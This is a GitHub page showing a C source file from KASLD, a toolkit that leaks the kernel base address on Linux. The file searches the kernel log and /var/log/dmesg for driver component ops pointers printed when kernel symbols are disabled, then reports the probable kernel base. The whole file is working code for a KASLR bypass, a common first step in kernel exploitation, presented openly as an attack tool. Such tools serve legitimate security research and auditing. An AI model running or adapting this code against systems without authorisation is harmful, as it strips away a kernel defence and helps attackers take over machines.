-
Notifications
You must be signed in to change notification settings - Fork 45
/
dmesg_driver_component_ops.c
134 lines (109 loc) · 3.28 KB
/
dmesg_driver_component_ops.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
// This file is part of KASLD - https://github.com/bcoles/kasld
//
// Search kernel log for driver component ops pointers.
//
// The `component_bind` and `__component_add` functions print ops functions
// to the kernel log:
//
// dev_dbg(master->parent, "binding %s (ops %ps)\n",
// dev_info(master->parent, "bound %s (ops %ps)\n",
// dev_err(master->parent, "failed to bind %s (ops %ps): %d\n",
// dev_dbg(dev, "adding component (ops %ps)\n", ops);
//
// The "%ps" printk format prints the symbol name; however, if kernel symbols
// are disabled (CONFIG_KALLSYMS=n) then raw pointers are printed instead.
//
// Kernels may be compiled without debugging symbols to decrease the size of
// the kernel image.
//
// Requires:
// - kernel.dmesg_restrict = 0; or CAP_SYSLOG capabilities; or
// readable /var/log/dmesg.
// - CONFIG_KALLSYMS=n
//
// References:
// https://elixir.bootlin.com/linux/v5.15.12/source/drivers/base/component.c
// https://cateee.net/lkddb/web-lkddb/KALLSYMS.html
// https://www.kernel.org/doc/html/latest/core-api/printk-formats.html
// ---
// <[email protected]>
#define _GNU_SOURCE
#include "include/kasld.h"
#include "include/syslog.h"
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>
unsigned long search_dmesg_driver_component_ops() {
char *syslog;
char *ptr;
char *endptr;
char *ops_buf;
const char *needle = " (ops 0x";
int size;
unsigned long addr = 0;
unsigned long leaked_addr = 0;
printf("[.] searching dmesg for driver component ops pointers ...\n");
if (mmap_syslog(&syslog, &size))
return 0;
ptr = strtok(syslog, "\n");
while ((ptr = strtok(NULL, "\n")) != NULL) {
ops_buf = strstr(ptr, needle);
if (ops_buf == NULL)
continue;
leaked_addr = strtoul(&ops_buf[strlen(needle)], &endptr, 16);
if (!leaked_addr)
continue;
if (leaked_addr >= KERNEL_BASE_MIN && leaked_addr <= KERNEL_BASE_MAX) {
// printf("Found kernel pointer: %lx\n", leaked_addr);
if (!addr || leaked_addr < addr)
addr = leaked_addr;
}
}
return addr;
}
unsigned long search_dmesg_log_file_driver_component_ops() {
FILE *f;
char *endptr;
char *line = 0;
size_t size = 0;
char *ops_buf;
const char *path = "/var/log/dmesg";
const char *needle = " (ops 0x";
unsigned long leaked_addr = 0;
unsigned long addr = 0;
printf("[.] searching %s for driver component ops pointers ...\n", path);
f = fopen(path, "rb");
if (f == NULL) {
perror("[-] fopen");
return 0;
}
while ((getline(&line, &size, f)) != -1) {
ops_buf = strstr(line, needle);
if (ops_buf == NULL)
continue;
leaked_addr = strtoul(&ops_buf[strlen(needle)], &endptr, 16);
if (!leaked_addr)
continue;
if (leaked_addr >= KERNEL_BASE_MIN && leaked_addr <= KERNEL_BASE_MAX) {
// printf("Found kernel pointer: %lx\n", leaked_addr);
if (!addr || leaked_addr < addr)
addr = leaked_addr;
}
}
free(line);
fclose(f);
return addr;
}
int main() {
unsigned long addr = search_dmesg_driver_component_ops();
if (!addr)
addr = search_dmesg_log_file_driver_component_ops();
if (!addr)
return 1;
printf("lowest leaked address: %lx\n", addr);
printf("possible kernel base: %lx\n", addr & -KERNEL_ALIGN);
return 0;
}